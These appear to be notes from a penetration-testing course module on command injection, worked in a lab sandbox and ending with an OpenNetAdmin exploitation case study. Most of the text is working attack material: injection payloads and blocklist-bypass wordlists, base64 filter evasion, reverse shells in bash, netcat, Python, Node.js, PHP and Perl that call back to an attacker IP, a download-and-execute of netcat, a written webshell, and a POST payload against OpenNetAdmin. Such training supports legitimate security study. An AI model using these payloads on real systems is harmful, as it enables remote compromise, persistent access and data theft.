Module 13: Command Injection

Discovery of Command Injection

Accessing the Command Injection Sandbox

Start the VPN, the VM, and add IP to hosts.

Familiarizing Ourselves with the Sandbox

Python Ping Output

First command injection payload

http://ci-sandbox:80/python/index.py?ip=127.0.0.1|id

First successful command injection

Where is Command Injection Most Common?

Vulnerable Code Snippet

<?php
$IP = $_GET['IP'];

echo "<pre>";
system("ping -c 5 ".$IP);
echo "</pre>";
?>

About the Chaining of Commands & System Calls

Executing a single command

kali@kali:~$ ls -ls  
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos

Chaining our first commands

kali@kali:~$ ls -ls ; id
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos

uid=1000(kali) gid=1000(kali) groups=1000(kali),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),120(wireshark),134(scanner),142(kaboxer)

In addition to the semicolon, which allows us to chain multiple commands together in one statement, another unique separator for Linux is the newline (\n), which exists in every HTTP request. Its hexadecimal value is 0x0A.

Chaining with Logical AND (Success)

kali@kali:~$ whoami && hostname
kali
kali

Chaining with Logical AND (Failure)

kali@kali:~$ foobar && hostname
foobar: command not found

Chaining with Logical OR (Failure)

kali@kali:~$ whoami || id      
kali

Chaining with Logical OR (Success)

kali@kali:~$ foobar || whoami  
foobar: command not found
kali

Inline Execution Characters

`cmd`
$(cmd)

Chaining with inline execution

kali@kali:~$ echo "This is an echo statement"
This is an echo statement

kali@kali:~$ echo "This is an `whoami` echo statement"
This is an kali echo statement

kali@kali:~$ echo "This is an $(whoami) echo statement"
This is an kali echo statement

Dealing with Common Protections

Typical Input Normalization - Sending Clean Payloads

Starting a Netcat Listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Our Wrapped Payload with No URL Encoding

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'

Encoding our Payload in Burp Suite's Repeater

Our Encoded Payload result

bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'

Our Wrapped Payload with URL Encoding (ready to be sent)

kali@kali:~$ curl "http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'"

The above could have just been sent in Burp Suite's Repeater after URL-encoding the request...

Receiving a root privileged shell

...
listening on [any] 9090 ...
connect to [172.16.80.2] from (UNKNOWN) [172.16.80.1] 59993
bash: cannot set terminal process group (19): Inappropriate ioctl for device
bash: no job control in this shell
root@cdee2640ffbf:/#

Typical Input Sanitization - Blocklisted Strings Bypass

Blocklisted string

A Null Statement Injection Bypass can be inserted between any characters of our choosing.

This technique also works for more complex payloads like "nc -nlvp 9090", which becomes: n$()c -n$()lvp 9090

Null Statement Injection into our previous command injection

kali@kali:~$ wh$()oami
kali

Bypassing blocklisted strings with a null statement

A short wordlist to work with wfuzz

bogus
;id
|id
`id`
i$()d
;i$()d
|i$()d
FAIL||i$()d
&&id
&id
FAIL_INTENT|id
FAIL_INTENT||id
`sleep 5`
`sleep 10`
`id`
$(sleep 5)
$(sleep 10)
$(id)
;`echo 'aWQK' |base64 -d`
FAIL_INTENT|`echo 'aWQK' |base64 -d`
FAIL_INTENT||`echo 'aWQK' |base64 -d`

Fuzzing with our Custom Wordlist

kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000003:   200        68 L     124 W      1156 Ch     "|id"
000000015:   200        68 L     124 W      1156 Ch     "`id`"
000000018:   200        68 L     124 W      1156 Ch     "$(id)"
000000001:   200        68 L     117 W      1113 Ch     "bogus"
000000012:   200        68 L     124 W      1156 Ch     "FAIL_INTENT||id"
000000011:   200        68 L     124 W      1156 Ch     "FAIL_INTENT|id"
000000008:   200        69 L     120 W      1167 Ch     "FAIL||i$()d"
000000005:   200        68 L     117 W      1113 Ch     "i$()d"
000000002:   200        68 L     124 W      1156 Ch     ";id"
000000017:   200        68 L     124 W      1156 Ch     "$(sleep 10)"
000000014:   200        68 L     124 W      1156 Ch     "`sleep 10`"
000000004:   200        68 L     124 W      1156 Ch     "`id`"
000000020:   200        69 L     120 W      1167 Ch     "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021:   200        69 L     120 W      1167 Ch     "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000016:   200        68 L     124 W      1156 Ch     "$(sleep 5)"
000000013:   200        68 L     124 W      1156 Ch     "`sleep 5`"
000000007:   200        69 L     120 W      1167 Ch     "|i$()d"
000000019:   200        79 L     187 W      1647 Ch     ";`echo 'aWQK' |base64 -d`"
000000009:   200        78 L     184 W      1593 Ch     "&&id"
000000006:   200        79 L     187 W      1647 Ch     ";i$()d"
000000010:   200        78 L     184 W      1593 Ch     "&id"

Total time: 0
Processed Requests: 21
Filtered Requests: 0
Requests/sec.: 0

Fuzzing with our Custom Wordlist and a Suppressed Response-Size of 1156 bytes

kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                 
=====================================================================
000000001:   200        68 L     117 W      1113 Ch     "bogus"                                       
000000005:   200        68 L     117 W      1113 Ch     "i$()d"                                 
000000008:   200        69 L     120 W      1167 Ch     "FAIL||i$()d"        
000000020:   200        69 L     120 W      1167 Ch     "FAIL_INTENT|`echo 'aWQK' |base64 -d`"       
000000021:   200        69 L     120 W      1167 Ch     "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000010:   200        78 L     184 W      1593 Ch     "&id"                                        
000000009:   200        78 L     184 W      1593 Ch     "&&id"                                      
000000007:   200        69 L     120 W      1167 Ch     "|i$()d"                                      
000000006:   200        79 L     187 W      1647 Ch     ";i$()d"                  
000000019:   200        79 L     187 W      1647 Ch     ";`echo 'aWQK' |base64 -d`"

Total time: 0
Processed Requests: 21
Filtered Requests: 11
Requests/sec.: 0

Results in our web browser

Encoding our payload with Base64

kali@kali:~$ echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==

Our Full and Complete Payload

http://ci-sandbox/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

Bypassed Blocklisted Strings with Base64 Payload

Blind OS Command Injection Bypass

Attempting to execute the `id`command with blind command injection

http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;id

No output from our id command

Capturing the initial time

kali@kali:~$ time curl http://ci-sandbox:80/php/blind.php?ip=127.0.0.1
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
  background-color: #121212;
}
.check{
  background-color: #1f1f1f;
  border-radius: 4px;
  padding-top: 34px;
  width: 600px;
  height: 150px;
  align-self: center;
  box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
  color: #00ff4c;
}

.offline{
  color: #ff0000;
}

.noParam{
  color: #FFFFFF;
}

</style>
</head>
<body>


<center>
<div class="check" align="center">
        <pre>
        <h3 class='offline'>[ - ] Host is DOWN </h3>        </pre>
</div>
  <img src="logo.png"/>
</center>

</body>
</html>

real 0m10.014s

Bypassing blind sanitization wtih sleep for execution verification

kali@kali:~$ time curl "http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;sleep%2020"
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
  background-color: #121212;
}
.check{
  background-color: #1f1f1f;
  border-radius: 4px;
  padding-top: 34px;
  width: 600px;
  height: 150px;
  align-self: center;
  box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
  color: #00ff4c;
}

.offline{
  color: #ff0000;
}

.noParam{
  color: #FFFFFF;
}

</style>
</head>
<body>


<center>
<div class="check" align="center">
        <pre>
        <h3 class='offline'>[ - ] Host is DOWN </h3>        </pre>
</div>
  <img src="logo.png"/>
</center>

</body>
</html>

real	0m30.002s

Extra Mile

Do the lab.

Enumeration and Exploitation

Enumerating Command Injection Capabilities

Common Linux Capability Checks

Command	Used For
wget	File Transfer
curl	File Transfer
fetch	File Transfer
gcc	Compilation
cc	Compilation
nc	Shells, File Transfer, Port Forwarding
socat	Shells, File Transfer, Port Forwarding
ping	Networking, Code Execution Verification
netstat	Networking
ss	Networking
ifconfig	Networking
ip	Networking
hostname	Networking
php	Shells, Code Execution
python	Shells, Code Execution
python3	Shells, Code Execution
perl	Shells, Code Execution
java	Shells, Code Execution

Common Windows Capability Checks

Capability	Used For
Powershell	Code Execution, Enumeration, Movement, Payload Delivery
Visual Basic	Code Execution, Enumeration, Movement, Payload Delivery
tftp	File Transfer
ftp	File Transfer
certutil	File Transfer
Python	Code Execution, Enumeration
.NET	Code Execution, Privilege Escalation, Payload Delivery
ipconfig	Networking
netstat	Networking
hostname	Networking
systeminfo	System Information, Patches, Versioning, Arch, etc.

Custom Linux Capability Wordlist

w00tw00t
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat  
ss
ifconfig
ip
hostname
php
python
python3
perl
java

Fuzzing and checking for capabilities with our Custom Wordlist

kali@kali:~$ wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which FUZZ"

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which%20FUZZ
Total requests: 19

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000006:   200        11 L     69 W       503 Ch      "cc"
000000015:   200        11 L     69 W       510 Ch      "php"
000000018:   200        11 L     69 W       505 Ch      "perl"
000000017:   200        11 L     69 W       508 Ch      "python3"
000000001:   200        10 L     68 W       491 Ch      "w00tw00t"
000000014:   200        11 L     69 W       506 Ch      "hostname"
000000019:   200        10 L     68 W       491 Ch      "java"
000000007:   200        11 L     69 W       499 Ch      "nc"
000000016:   200        11 L     69 W       508 Ch      "python"
000000003:   200        11 L     69 W       505 Ch      "curl"
000000012:   200        11 L     69 W       506 Ch      "ifconfig"
000000011:   200        10 L     68 W       491 Ch      "ss"
000000010:   200        11 L     69 W       504 Ch      "netstat"
000000013:   200        10 L     68 W       491 Ch      "ip"
000000009:   200        11 L     69 W       502 Ch      "ping"
000000004:   200        10 L     68 W       492 Ch      "fetch"
000000005:   200        11 L     69 W       505 Ch      "gcc"
000000008:   200        10 L     68 W       492 Ch      "socat"
000000002:   200        11 L     69 W       506 Ch      "wget"

Total time: 0
Processed Requests: 19
Filtered Requests: 0
Requests/sec.: 0

Enumerated capabilities

cc
gcc
php
perl
python
python3
hostname
nc
netstat
curl
wget
ping
ifconfig

We highly recommend taking note of the various options available when attempting to gain a reverse shell. PayloadAllTheThings is an excellent resource to learn about these.

Obtaining a Shell - Netcat

Starting a Netcat listener

nc -nlvp 9090

Evaluating our execution privileges

Endpoin for our command injection

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash

A root shell with netcat

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51321
whoami
root

Some versions of Netcat don't have the "-e" option; however, the Netcat binary on Kali Linux has no such restriction.

Obtaining a Shell - Python

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Unfolded Python Payload

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.49.51",9090))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);'

Starting a Netcat Listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Full endpoint with payload in the command injection sandbox

http://ci-sandbox/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51809
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

Obtaining a Shell - Node.js

Chained Node.js Reverse Shell

echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

The Full Command Injection Endpoint

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

The full URL-encoded command injection endpoint

http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo%20%22require(%27child_process%27).exec(%27nc%20-nv%20192.168.49.51%209090%20-e%20%2Fbin%2Fbash%27)%22%20%3E%20%2Fvar%2Ftmp%2Foffsec.js%20%3B%20node%20%2Fvar%2Ftmp%2Foffsec.js

Starting a Netcat listener on port 9090

kali@kali:!$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving our reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 52319
whoami
root

As additional practice, take note of additional Node payload options available from PayloadAllTheThings.

Obtaining a Shell - PHP

PHP Reverse Shell Examples

php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

The first half of our PHP Payloads

php -r '$sock=fsockopen("192.168.49.51",9090);

Various PHP Execution Options

exec("/bin/sh -i <&3 >&3 2>&3");'
shell_exec("/bin/sh -i <&3 >&3 2>&3");'
system("/bin/sh -i <&3 >&3 2>&3");'
passthru("/bin/sh -i <&3 >&3 2>&3");'
popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Are there any disabled functions?

Finding a live system with phpinfo() is rare but not unheard of. It contains a wealth of information and is sometimes left behind by system administrators or web developers.

phpinfo(); function and disabled functions

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Not encoded endpoing (including our payload)

http://ci-sandbox/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"

Complete endpoint (including our payload)

http://ci-sandbox/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53017
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@5bce60aa9510:/var/www/html/php$

Obtaining a Shell - Perl

Perl Reverse Shell

perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Reverse Shell Unfolded

use Socket;
$i="192.168.49.51";
$p=9090;

socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))) {
     open(STDIN,">&S");
     open(STDOUT,">&S");
     open(STDERR,">&S");
     exec("/bin/sh -i");
}

Full URL Encoded Endpoint

http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53590
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#

File Transfer

File transfer enumeration in the web browser

Placing the nc binary in our Apache2 web root

kali@kali:~$ sudo cp /bin/nc /var/www/html/
[sudo] password for kali:

kali@kali:~$

Starting the Apache2 Service

kali@kali:~$ sudo service apache2 start

The full payload (unencoded)

wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash

The full payload (encoded)

wget%20http://192.168.49.51:80/nc%20-O%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bash

Starting a netcat listener on port 9090

kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...

Receiving the reverse shell

...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 60052     
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Extra Mile I

Transfer a different payload, permit the payload, and change the file permissions to execute it for a reverse shell.

Writing a Web Shell

Finding our present working directory

http://ci-sandbox:80/php/index.php?ip=127.0.0.1;pwd

Document Root

Using echo to write out our own webshell

echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php

Writing our own webshell

http://ci-sandbox:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php

Webshell confirmation

Change Directory and Listing Contents

Contents of the web root

This limitation of web shells is why we always try to leverage them to acquire a full reverse shell.

Extra Mile II

What are the three world writable directories (permissions of 777 or rwx) with which we can write to, execute from, and read from in Linux Operating Systems? It's useful to know these if we ever need to write out to the file system.

• /tmp/

• /var/tmp/

• /dev/shm/

Case Study - OpenNetAdmin (ONA)

Accessing OpenNetAdmin

Start the VPN, VM, and add the IP to your hosts file.

Discovery and Assessment

OpenNetAdmin Landing Page

Logged in as Administrator

More often than not, if an exploit requires authentication, a low-privileged user (or even a guest user) will suffice for successful exploitation.

ONA Search Functionality

Examining the Nmap Functionality

ONA Reports Section

Discovery of Ping Functionality

Ping Results Window

Exploitation

Activating the Intercept Feature of Burp Suite

Initial Request of Ping in Burp Suite

The Second Request of "Ping to Verify"

Analysis of Request in the Repeater Tab

Full POST Data Payload attempting command injection

xajax=window_submit&xajaxr=1632763728103&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E172.24.0.2;id&xajaxargs[]=ping

Introduction of our Payload into Repeater

Validation of command injection